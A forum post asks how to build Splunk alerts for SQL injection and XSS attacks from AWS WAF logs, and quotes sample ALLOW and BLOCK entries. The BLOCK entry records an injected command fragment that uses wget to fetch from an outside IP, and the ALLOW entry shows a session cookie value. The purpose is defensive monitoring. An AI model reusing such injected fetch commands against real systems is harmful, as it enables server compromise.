Hello,

Integrated the AWS WAF logs to Splunk, now we need to monitor the Splunk SQL Injection and Cross-Site Script attacks in Splunk.

Can any once please share the query on how to set the alerts for SQL Injection and Cross-Site Script.

Here are the Sample logs from AWS WAF logs which is from ALLOW and BLOCK action, and how to raise an incident if any one attack happen.

action: ALLOW events:
{"timestamp":1602659653929,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxx-PROD-ALB/06b9064d5ca45468","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"xx.xx.xxx.xx","country":"AU","headers":[{"name":"Host","value":"access.xxxxxx.com.in"},{"name":"Sec-WebSocket-Key","value":"LWyNMG9kCDp7z0UOSXpoUQ=="},{"name":"adSsoCookie","value":"O2bbUYoRhXfwrLaeD6j5mDLAG_s.*AAJTSQACMDIAAlNLABxueHBJaFYzYUVxQXg2VEdUS2Q4VllTVkQ2UzQ9AAR0eXBlAANDVFMAAlMxAAIwMQ..*"},{"name":"Sec-WebSocket-Version","value":"13"},{"name":"Sec-WebSocket-Protocol","value":"v1.notifications.xxxxxx.org"}],"uri":"/xxxxxxxx/notifications","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"1-5f86a545-7e0faddd488b61a0746fe97d"}}

action: BLOCK events:
{"timestamp":1602647260818,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"3afb3065-2ef7-41f9-9f29-972876893e09","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"QUERY_STRING","matchedData":["next_file","/*;wget http://xxx.xx.xx.xxx:5"]}],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxxxxx-PROD-ALB/..."}}